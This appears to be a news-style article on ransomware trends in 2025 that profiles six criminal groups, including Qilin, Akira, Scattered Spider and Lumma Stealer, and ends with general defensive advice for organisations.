Ransomware in 2025: A New Era of Identity Targeting

If 2024 saw ransomware’s resurgence, then 2025 marked a significant pivot toward targeting personal identities. Cybercriminals have evolved from breaching networks to honing in on individuals and the very essence of their identities. But which groups are at the forefront of this troubling trend?

The Cybercriminal Toolbox: AI and Manipulation

The modern arsenal of cybercriminals is diverse and increasingly sophisticated. At the heart of this evolution are techniques like social engineering, deepfakes, and AI-facilitated chat tools, which have turned everyday communication into potential attack vectors. A single stolen password or an intercepted call can grant offenders access to internal systems. This accessibility has broadened the landscape for identity manipulation, allowing attackers to exploit seemingly legitimate credentials to bypass conventional security measures.

AI’s Role in Identity Manipulation

Artificial intelligence has taken the lead in reshaping how cybercrime operates. It’s no longer just about ransomware encrypting files; attackers can now deploy AI for phishing attacks, voice cloning, and conducting fake job interviews. These techniques enable a new breed of deception that makes traditional defenses far less effective. While ransomware may not be setting records like it used to, the blackmail economy has stabilized on a high level, focusing on stealing data and leveraging it for extortion, showcasing a shift from sheer brute-force tactics to more nuanced strategies.

The Six Most Notorious Cybercriminal Groups of 2025

According to the annual Nastiest Malware Report from OpenText, six groups significantly shaped the cyber landscape this year.

1. Qilin (aka Agenda)

Qilin was involved in over 200 confirmed attacks, particularly against hospitals, laboratories, and community facilities. One alarming incident resulted in the death of a patient due to diagnostic service failures caused by their attack. Their unique ransomware panel features a chat function that allows partners to communicate directly with professional negotiators, illustrating a level of professionalism in the ransomware-as-a-service (RaaS) model unheard of before.

2. Akira

Targeting financially robust companies and managed service providers, Akira accounted for nearly 20% of global ransomware incidents. This group’s operations are characterized by technical precision and streamlined processes, including a systematic approach to negotiations. Their promotional tactics resemble corporate strategies, which have transformed them into a reliable RaaS platform. They exploit VPN vulnerabilities and operate on a global scale.

3. Scattered Spider

One of the most influential groups of 2025, Scattered Spider utilized social engineering, SIM swapping, and deepfake voice imitation to compromise large organizations. Though law enforcement apprehended core members in September, the group’s innovative techniques continue through copycats and spin-offs. Their skillful blend of psychological manipulation and targeted identity exploitation has made them a formidable player in the realm of access procurement.

4. Play Ransomware

Despite less media attention, Play Ransomware emerged as one of the most destructive groups by compromising over 900 managed service providers. Their notorious tactic of intermittent encryption — affecting only parts of files — hastened execution and made detection challenging. Play’s advanced toolset also includes capabilities for virtualized environments, emphasizing the targeted exploitation of IT dependencies.

5. ShinyHunters

This group has infiltrated cloud platforms, often staying hidden for extended periods before unleashing stolen data. Major brands like Google and Salesforce fell victim to their operations. ShinyHunters have demonstrated a strategic agility by timing the release of stolen information to align with regulatory notifications, leveraging compliance risks as part of their extortion strategy, signaling a troubling convergence of cybercrime and regulatory frameworks.

6. Lumma Stealer

Seen as the backbone of many ransomware operations, Lumma Stealer collects a wide range of access data, cookies, and tokens from compromised systems. The data soon circulates on darknet markets, becoming fodder for groups like Akira, Qilin, and Play. The malware’s effectiveness is amplified by its combination with social engineering techniques, such as fake error messages that prompt users to execute malicious actions, undermining conventional defense mechanisms.

The Evolving Landscape of Ransomware

The ransomware scene remains incredibly lucrative, despite an influx of protective measures and a growing trend of organizations refusing to pay ransoms. Although ransom amounts have plateaued, financial losses are on the rise, indicating a complex relationship between increased defenses and the evolving strategies of organized cybercriminals.

Despite some groups facing challenges in enforcing their demands, others continue to negotiate multi-million dollar settlements with chilling efficiency. This underscores the extent to which ransomware has morphed into a sophisticated business model, further emphasizing the necessity for robust defensive measures.

Implementing Effective Defense Strategies

Organizations must focus on structured and well-organized responses to counteract these threats effectively.

1. Regular Patching: Keeping systems up to date helps mitigate vulnerabilities that attackers can exploit.

2. Credible Backup Strategies: Frequent and reliable backups can minimize damage in the event of an attack.

3. Robust Access Controls: Limiting access to sensitive data reduces the risk of unauthorized entry.

4. Hardened Remote Access: Secure remote connections can prevent exploits from remote work environments.

5. Awareness Training: Continually educating employees on social engineering tactics can empower them to recognize and report potential threats.

Establishing these practices not only enhances an organization’s capacity to respond but also reduces its vulnerability over the long term.